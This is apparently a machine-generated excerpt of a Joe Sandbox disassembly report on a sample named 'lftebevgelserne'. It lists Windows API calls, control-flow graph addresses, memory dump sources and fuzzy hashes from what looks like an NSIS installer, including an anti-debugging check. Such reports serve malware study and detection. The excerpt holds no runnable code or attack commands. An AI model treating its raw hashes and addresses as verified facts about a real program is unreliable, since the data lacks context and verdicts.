                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                      • String ID: s@
                                                      • API String ID: 3449924974-2533359417
                                                      • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                      • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                      • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                      • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                      • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                                      • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                      • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,00425738,00424EF0,00405B1F,00424EF0,00424EF0,00000000,00424EF0,00424EF0, 4Wu,?,00436800,0040582B,?,75573420,00436800), ref: 00406368
                                                      • FindClose.KERNEL32(00000000), ref: 00406374
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: 8WB
                                                      • API String ID: 2295610775-3088156181
                                                      • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                      • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                                      • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                      • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 1F2361DA
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 1F2361E4
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1F2361F1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: a29a24f0fd056006f446ea0a37e36cff8f6a9a7685568b785fec67022a008d79
                                                      • Instruction ID: 97f214b106ea595eb6e6e75c522232bc09a33865bdc0ca77676a7c6a428cce35
                                                      • Opcode Fuzzy Hash: a29a24f0fd056006f446ea0a37e36cff8f6a9a7685568b785fec67022a008d79
                                                      • Instruction Fuzzy Hash: 5E31B7B5D0122D9BCB21DF64D988B8DBBB8BF08711F5041DAE81CA7250E770AB95CF45
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,1F234A8A,?,1F242238,0000000C,1F234BBD,00000000,00000000,?,1F232082,1F242108,0000000C,1F231F3A,?), ref: 1F234AD5
                                                      • TerminateProcess.KERNEL32(00000000,?,1F234A8A,?,1F242238,0000000C,1F234BBD,00000000,00000000,?,1F232082,1F242108,0000000C,1F231F3A,?), ref: 1F234ADC
                                                      • ExitProcess.KERNEL32 ref: 1F234AEE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 8abc6e46785bf8224a07e8606b70556e188927dcd30356f9a91ded004767129a
                                                      • Instruction ID: aa641deb47c39d66db27a1df60c87220cf9b0bb489129bd0ec23c2675b82d239
                                                      • Opcode Fuzzy Hash: 8abc6e46785bf8224a07e8606b70556e188927dcd30356f9a91ded004767129a
                                                      • Instruction Fuzzy Hash: 3FE04FF9400219AFCF01AF64CD6CA493F2AFF08B52B604050F9444B821DB36E892CA44
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: 69cbba17474f471c0c925d9df38d53f0344627a722a865c49778552fe6ec1140
                                                      • Instruction ID: 47e0ddeb78b671f9f3e6c755486200fa05282483d1c4b94cf62a7f639c1739b9
                                                      • Opcode Fuzzy Hash: 69cbba17474f471c0c925d9df38d53f0344627a722a865c49778552fe6ec1140
                                                      • Instruction Fuzzy Hash: BBA011B02002228FC3008E30828E20C3AACAA08BA03020028E808C0880EB228820AA00

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 269 4052b8-4052d3 270 405462-405469 269->270 271 4052d9-4053a0 GetDlgItem * 3 call 404113 call 404a16 GetClientRect GetSystemMetrics SendMessageW * 2 269->271 273 405493-4054a0 270->273 274 40546b-40548d GetDlgItem CreateThread CloseHandle 270->274 293 4053a2-4053bc SendMessageW * 2 271->293 294 4053be-4053c1 271->294 276 4054a2-4054a8 273->276 277 4054be-4054c8 273->277 274->273 279 4054e3-4054ec call 404145 276->279 280 4054aa-4054b9 ShowWindow * 2 call 404113 276->280 281 4054ca-4054d0 277->281 282 40551e-405522 277->282 290 4054f1-4054f5 279->290 280->277 283 4054d2-4054de call 4040b7 281->283 284 4054f8-405508 ShowWindow 281->284 282->279 287 405524-40552a 282->287 283->279 291 405518-405519 call 4040b7 284->291 292 40550a-405513 call 405179 284->292 287->279 295 40552c-40553f SendMessageW 287->295 291->282 292->291 293->294 298 4053d1-4053e8 call 4040de 294->298 299 4053c3-4053cf SendMessageW 294->299 300 405641-405643 295->300 301 405545-405570 CreatePopupMenu call 40603c AppendMenuW 295->301 308 4053ea-4053fe ShowWindow 298->308 309 40541e-40543f GetDlgItem SendMessageW 298->309 299->298 300->290 306 405572-405582 GetWindowRect 301->306 307 405585-40559a TrackPopupMenu 301->307 306->307 307->300 310 4055a0-4055b7 307->310 311 405400-40540b ShowWindow 308->311 312 40540d 308->312 309->300 313 405445-40545d SendMessageW * 2 309->313 314 4055bc-4055d7 SendMessageW 310->314 315 405413-405419 call 404113 311->315 312->315 313->300 314->314 316 4055d9-4055fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 314->316 315->309 318 4055fe-405625 SendMessageW 316->318 318->318 319 405627-40563b GlobalUnlock SetClipboardData CloseClipboard 318->319 319->300
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                      • GetClientRect.USER32(?,?), ref: 00405362
                                                      • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                      • ShowWindow.USER32(?,00000008), ref: 00405405
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                        • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                      • CloseHandle.KERNEL32(00000000), ref: 0040548D
                                                      • ShowWindow.USER32(00000000), ref: 004054B1
                                                      • ShowWindow.USER32(?,00000008), ref: 004054B6
                                                      • ShowWindow.USER32(00000008), ref: 00405500
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                      • CreatePopupMenu.USER32 ref: 00405545
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                      • GetWindowRect.USER32(?,?), ref: 00405579
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                      • OpenClipboard.USER32(00000000), ref: 004055DA
                                                      • EmptyClipboard.USER32 ref: 004055E0
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                      • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                      • CloseClipboard.USER32 ref: 0040563B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {$&B
                                                      • API String ID: 590372296-2518801558
                                                      • Opcode ID: ab5ff72ede274ca2f8adce387912c708f4c81a4bb8b5d3971860f699103799fc
                                                      • Instruction ID: 524c7e0856e054b6ca4006a946b5ee98248767cb0fd57b02f6ab58b6cc7b5d2d
                                                      • Opcode Fuzzy Hash: ab5ff72ede274ca2f8adce387912c708f4c81a4bb8b5d3971860f699103799fc
                                                      • Instruction Fuzzy Hash: A6B13B71900208FFDB219F60DD89AAE7B79FB44355F00803AFA01B61A0C7755E92DF69

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 442 403c06-403c18 443 403d59-403d68 442->443 444 403c1e-403c24 442->444 446 403db7-403dcc 443->446 447 403d6a-403db2 GetDlgItem * 2 call 4040de SetClassLongW call 40140b 443->447 444->443 445 403c2a-403c33 444->445 448 403c35-403c42 SetWindowPos 445->448 449 403c48-403c4b 445->449 451 403e0c-403e11 call 40412a 446->451 452 403dce-403dd1 446->452 447->446 448->449 453 403c65-403c6b 449->453 454 403c4d-403c5f ShowWindow 449->454 459 403e16-403e31 451->459 456 403dd3-403dde call 401389 452->456 457 403e04-403e06 452->457 460 403c87-403c8a 453->460 461 403c6d-403c82 DestroyWindow 453->461 454->453 456->457 479 403de0-403dff SendMessageW 456->479 457->451 464 4040ab 457->464 465 403e33-403e35 call 40140b 459->465 466 403e3a-403e40 459->466 470 403c8c-403c98 SetWindowLongW 460->470 471 403c9d-403ca3 460->471 468 404088-40408e 461->468 467 4040ad-4040b4 464->467 465->466 475 403e46-403e51 466->475 476 404069-404082 DestroyWindow EndDialog 466->476 468->464 473 404090-404096 468->473 470->467 477 403d46-403d54 call 404145 471->477 478 403ca9-403cba GetDlgItem 471->478 473->464 480 404098-4040a1 ShowWindow 473->480 475->476 481 403e57-403ea4 call 40603c call 4040de * 3 GetDlgItem 475->481 476->468 477->467 482 403cd9-403cdc 478->482 483 403cbc-403cd3 SendMessageW IsWindowEnabled 478->483 479->467 480->464 512 403ea6-403eab 481->512 513 403eae-403eea ShowWindow EnableWindow call 404100 EnableWindow 481->513 487 403ce1-403ce4 482->487 488 403cde-403cdf 482->488 483->464 483->482 491 403cf2-403cf7 487->491 492 403ce6-403cec 487->492 490 403d0f-403d14 call 4040b7 488->490 490->477 493 403cf9-403cff 491->493 494 403d2d-403d40 SendMessageW 491->494 492->494 497 403cee-403cf0 492->497 498 403d01-403d07 call 40140b 493->498 499 403d16-403d1f call 40140b 493->499 494->477 497->490 508 403d0d 498->508 499->477 509 403d21-403d2b 499->509 508->490 509->508 512->513 516 403eec-403eed 513->516 517 403eef 513->517 518 403ef1-403f1f GetSystemMenu EnableMenuItem SendMessageW 516->518 517->518 519 403f21-403f32 SendMessageW 518->519 520 403f34 518->520 521 403f3a-403f78 call 404113 call 40601a lstrlenW call 40603c SetWindowTextW call 401389 519->521 520->521 521->459 530 403f7e-403f80 521->530 530->459 531 403f86-403f8a 530->531 532 403fa9-403fbd DestroyWindow 531->532 533 403f8c-403f92 531->533 532->468 535 403fc3-403ff0 CreateDialogParamW 532->535 533->464 534 403f98-403f9e 533->534 534->459 536 403fa4 534->536 535->468 537 403ff6-40404d call 4040de GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 535->537 536->464 537->464 542 40404f-404067 ShowWindow call 40412a 537->542 542->468
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                      • ShowWindow.USER32(?), ref: 00403C5F
                                                      • DestroyWindow.USER32 ref: 00403C73
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                      • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                      • GetDlgItem.USER32(?,?), ref: 00403D79
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403DEE
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                      • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                      • EnableWindow.USER32(?,?), ref: 00403EC7
                                                      • EnableWindow.USER32(?,?), ref: 00403EE2
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403EF8
                                                      • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F17
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                                      • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                      • String ID: &B
                                                      • API String ID: 184305955-3208460036
                                                      • Opcode ID: 7ec5d6d8830c14dd6c59fcd4d740f7405b1c3e71a87f8c2d624ec054901d1d72
                                                      • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                                      • Opcode Fuzzy Hash: 7ec5d6d8830c14dd6c59fcd4d740f7405b1c3e71a87f8c2d624ec054901d1d72
                                                      • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 545 403863-40387b call 4063f4 548 40387d-40388d call 405f61 545->548 549 40388f-4038c6 call 405ee7 545->549 557 4038e9-403912 call 403b39 call 405ad6 548->557 553 4038c8-4038d9 call 405ee7 549->553 554 4038de-4038e4 lstrcatW 549->554 553->554 554->557 563 4039a4-4039ac call 405ad6 557->563 564 403918-40391d 557->564 570 4039ba-4039df LoadImageW 563->570 571 4039ae-4039b5 call 40603c 563->571 564->563 565 403923-40394b call 405ee7 564->565 565->563 575 40394d-403951 565->575 573 403a60-403a68 call 40140b 570->573 574 4039e1-403a11 RegisterClassW 570->574 571->570 588 403a72-403a7d call 403b39 573->588 589 403a6a-403a6d 573->589 576 403a17-403a5b SystemParametersInfoW CreateWindowExW 574->576 577 403b2f 574->577 579 403963-40396f lstrlenW 575->579 580 403953-403960 call 4059fb 575->580 576->573 582 403b31-403b38 577->582 583 403971-40397f lstrcmpiW 579->583 584 403997-40399f call 4059ce call 40601a 579->584 580->579 583->584 587 403981-40398b GetFileAttributesW 583->587 584->563 591 403991-403992 call 405a1a 587->591 592 40398d-40398f 587->592 598 403a83-403a9d ShowWindow call 406384 588->598 599 403b06-403b0e call 40524c 588->599 589->582 591->584 592->584 592->591 606 403aa9-403abb GetClassInfoW 598->606 607 403a9f-403aa4 call 406384 598->607 604 403b10-403b16 599->604 605 403b28-403b2a call 40140b 599->605 604->589 610 403b1c-403b23 call 40140b 604->610 605->577 608 403ad3-403b04 DialogBoxParamW call 40140b call 4037b3 606->608 609 403abd-403acd GetClassInfoW RegisterClassW 606->609 607->606 608->582 609->608 610->589
                                                      APIs
                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                      • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,75573420,00436800,00434000,00000000), ref: 004038E4
                                                      • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,75573420), ref: 00403964
                                                      • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                      • GetFileAttributesW.KERNEL32(004271A0), ref: 00403982
                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 004039CB
                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                      • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                      • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                      • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                      • API String ID: 1975747703-1918744475
                                                      • Opcode ID: 4f9dca51b01f2e9a68abb90b62d3cff5debdd425081f11f9f2c149d9481a9570
                                                      • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                                      • Opcode Fuzzy Hash: 4f9dca51b01f2e9a68abb90b62d3cff5debdd425081f11f9f2c149d9481a9570
                                                      • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 619 40427b-40428d 620 404293-40429b 619->620 621 4043ad-4043ba 619->621 624 40429d-4042ac 620->624 625 4042ae-4042d2 620->625 622 404417-40441b 621->622 623 4043bc-4043c5 621->623 628 404421-404439 GetDlgItem 622->628 629 4044e9-4044f0 622->629 630 4044f8 623->630 631 4043cb-4043d1 623->631 624->625 626 4042d4 625->626 627 4042db-404356 call 4040de * 2 CheckDlgButton call 404100 GetDlgItem call 404113 SendMessageW 625->627 626->627 659 404361-4043a8 SendMessageW * 2 lstrlenW SendMessageW * 2 627->659 660 404358-40435b GetSysColor 627->660 635 4044aa-4044b1 628->635 636 40443b-404442 628->636 629->630 632 4044f2 629->632 634 4044fb-404502 call 404145 630->634 631->630 637 4043d7-4043e2 631->637 632->630 645 404507-40450b 634->645 635->634 642 4044b3-4044ba 635->642 636->635 641 404444-40445f 636->641 637->630 638 4043e8-404412 GetDlgItem SendMessageW call 404100 call 40450e 637->638 638->622 641->635 646 404461-4044a7 SendMessageW LoadCursorW SetCursor ShellExecuteW LoadCursorW SetCursor 641->646 642->634 647 4044bc-4044c0 642->647 646->635 650 4044d2-4044d6 647->650 651 4044c2-4044d0 SendMessageW 647->651 654 4044e4-4044e7 650->654 655 4044d8-4044e2 SendMessageW 650->655 651->650 654->645 655->654 659->645 660->659
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404319
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040434A
                                                      • GetSysColor.USER32(?), ref: 0040435B
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                      • lstrlenW.KERNEL32(?), ref: 0040437C
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                      • SendMessageW.USER32(00000000), ref: 004043FE
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                      • SetCursor.USER32(00000000), ref: 0040447D
                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 00404492
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                      • SetCursor.USER32(00000000), ref: 004044A1
                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 004044D0
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                      • String ID: N$open
                                                      • API String ID: 3615053054-904208323
                                                      • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                      • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                      • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                      • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
